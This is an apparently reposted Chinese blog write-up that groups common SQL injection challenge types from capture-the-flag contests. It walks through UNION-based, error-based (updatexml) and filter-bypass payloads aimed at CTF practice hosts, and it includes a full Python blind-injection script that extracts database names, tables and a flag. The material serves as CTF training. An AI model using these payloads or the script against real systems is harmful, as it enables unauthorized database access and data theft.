CTF中SQL注入常见题型整理

  • A+
所属分类:逆向工程

CTF中SQL注入常见题型整理

前言


 

CTF中SQL注入常见题型整理

正文

无过滤带回显的情况

手工注入

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

4. 注入出当前数据库所有的表名

id=-2' union select 1,2,3,(selectgroup_concat(table_name) from information_schema.tables wheretable_schema=database())#

CTF中SQL注入常见题型整理

5.注入出某一个表中的全部列名

id=-2'  union select1,2,3,(select group_concat(column_name) from information_schema.columns wheretable_name='fl4g')#

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理


SQLmap注入

CTF中SQL注入常见题型整理

执行结果

---

Parameter: id (POST)

    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 ANDtime-based blind

    Payload: id=1' AND SLEEP(5)AND 'ShhA'='ShhA

 

    Type: UNION query

    Title: Generic UNION query(NULL) - 4 columns

    Payload: id=-2292' UNION ALLSELECTCONCAT(0x716b716b71,0x45784b6e4e78446d737053476e4c4875704c6a58414e444171676264674f634d436c506f554d636b,0x71766a7671),NULL,NULL,NULL--EKPR

---

 

3. 获取所有的数据库名

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理


万能密码

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理



万能密码2

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理


过滤一部分的情况

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理


union绕过型

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

2.爆表
这个到后面的操作都需要到=,但是=被过滤,所以需要等价符号来取代,具体绕过方法看我的另一篇博文

username=admin' or updatexml/*&password=*/(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where !(table_schema <>database())),0x7e),1) or '1

CTF中SQL注入常见题型整理

在本次的环境中REGEXP也可以用来取代=

username=admin' or updatexml/*&password=*/(1,concat(0x7e,(selectgroup_concat(table_name) from information_schema.tables where table_schemaREGEXP database()),0x7e),1) or '1

3. 爆字段

username=admin' or updatexml/*&password=*/(1,concat(0x7e,(selectgroup_concat(column_name) from information_schema.columns where table_nameREGEXP 'ffll44jj' ),0x7e),1) or '1

CTF中SQL注入常见题型整理

4.爆内容

username=admin' or updatexml/*&password=*/(1,concat(0x7e,(selectvalue from ffll44jj ),0x7e),1) or '1


小结

遇到sql注入不要慌,恩。



Sql异或注入

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

1. 爆表:

http://123.206.87.240:9004/1ndex.php

?id=-2' uniounionn selecselectt 1, group_concat(table_name) frominfoorrmation_schema.tables where table_schema=database() --+

CTF中SQL注入常见题型整理

2. 爆字段

http://123.206.87.240:9004/1ndex.php

?id=-2' uniounionn selecselectt 1, group_concat(column_name) frominfoorrmation_schema.columns where table_name='flag1'--+

CTF中SQL注入常见题型整理

3. 爆数据

http://123.206.87.240:9004/1ndex.php

?id=-2' uniounionn selecselectt 1,flag1 from flag1--+

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理

1.爆表

http://123.206.87.240:9004/Once_More.php

?id=1' and updatexml(1,concat('_',(select group_concat(table_name) frominformation_schema.tables where table_schema=database()),'_'),1) --+

 

XPATH syntax error: ',flag2_'

2.爆字段

http://123.206.87.240:9004/Once_More.php

?id=1' and updatexml(1,concat('~',(select group_concat(column_name)from information_schema.columns where table_name='flag2'),'~'),1) --+

 

XPATH syntax error: '~flag2,address~'

 

3.爆内容

http://123.206.87.240:9004/Once_More.php

?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),1) --+

 

XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'


Sql盲注

CTF中SQL注入常见题型整理

CTF中SQL注入常见题型整理


#!/usr/bin/env python3

# coding:utf-8

# power by jedi

import requests

 

headers = {

    "POST":"/web/earnest/index.php HTTP/1.1",

    "Host":"ctf5.shiyanbar.com",

    "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101Firefox/52.0",

    "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",

    "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",

    "Accept-Encoding":"gzip, deflate"

}

url = "http://ctf5.shiyanbar.com/web/earnest/index.php"

str_right = "You are in"

guess ="abcdefghijklmnopqrstuvwxyz0123456789~+=-*/{}?!:@#$&[]._ "

 

 

def get_database_name_length():

   print("get_database_name_length start...")

    i = 0

    while True:

        data = {

            'id':"0'oorr(length(database())=%s)oorr'0" % i,

            "submit":"%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2"

        }

        response = requests.post(

            url, data=data,headers=headers, timeout=3).text

        # print(response)

        if str_right in response:

            print("databasename length: %s" % i)

            return i

        i += 1

 

 

def get_database_name():

    print("get_database_namestart...")

    # database_name_length =get_database_name_length()

    database_name_length = 18

    database_name = ""

    for i in range(0,database_name_length):

        i += 1

        for x in guess:

            data = {

                'id':"0'oorr(mid((database())from(%s)foorr(1))='%s')oorr'0" % (i, x),

               "submit": "%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2"

            }

            # print(x)

            try:

                response = requests.post(

                    url,data=data, headers=headers, timeout=3).text

                # print(data)

                if str_right inresponse:

                    database_name+= x

                   print("%s--------%s" % (i, x))

                    break

            except Exception ase:

                print(e)

    print("databasename:%s" % database_name)

 

 

def get_table_name():

    print("get_table_namestart...")

    table_names = ""

    for i in range(30):

        i += 1

        for x in guess:

            data = {

                "id":"0'oorr((select(mid(group_concat(table_name)from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"% (i, x)

            }

            try:

                response = requests.post(

                    url,data=data, headers=headers, timeout=3).text

                # print(data)

                if str_right inresponse:

                    table_names+= x

                   print("%s--------%s" % (i, x))

                    break

            except Exception ase:

                print(e)

    print("tablenames:%s" % table_names)

    '''

    1--------f

         2--------i

         3--------a

         4--------g

         6--------u

         7--------s

         8--------e

         9--------r

         10--------s

    '''

 

 

def get_column_name():

   print("get_column_name")

    column_name = ""

    for i in range(30):

        i += 1

        for x in guess:

            data = {

                "id":"0'oorr((select(mid(group_concat(column_name)from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"% (i, x)

            }

            try:

                response =requests.post(

                    url,data=data, headers=headers, timeout=3).text

                # print(data)

                if str_right in response:

                    column_name+= x

                   print("%s--------%s" % (i, x))

                    break

            except Exception ase:

                print(e)

    print("tablenames:%s" % column_name)

'''

1--------f

2--------l

3--------$

4--------4

5--------g

'''

def dump_flag():

    print("dump_flag")

    flag = ""

    for i in range(30):

        i += 1

        for x in guess:

            data = {

               "id":"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,x) 

            }

            #print(data)

            try:

                response =requests.post(url, data=data, headers=headers, timeout=3).text

                if str_right in response:

                    flag += x

                   print("%s-----%s"%(i,x))

                    break

            except Exception ase:

                print(e)

 

def main():

    # get_database_name_length()

    #get_table_name()

    #get_column_name()

    dump_flag()

 

if __name__ == '__main__':

    main()

 

小结:sql盲注一般先要判断盲注的类型,然后判断被过滤的关键字,再然后关键字绕过,最后编码。

 

转载自:https://blog.csdn.net/huanghelouzi/article/details/82999684




本文始发于微信公众号(LemonSec):CTF中SQL注入常见题型整理

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: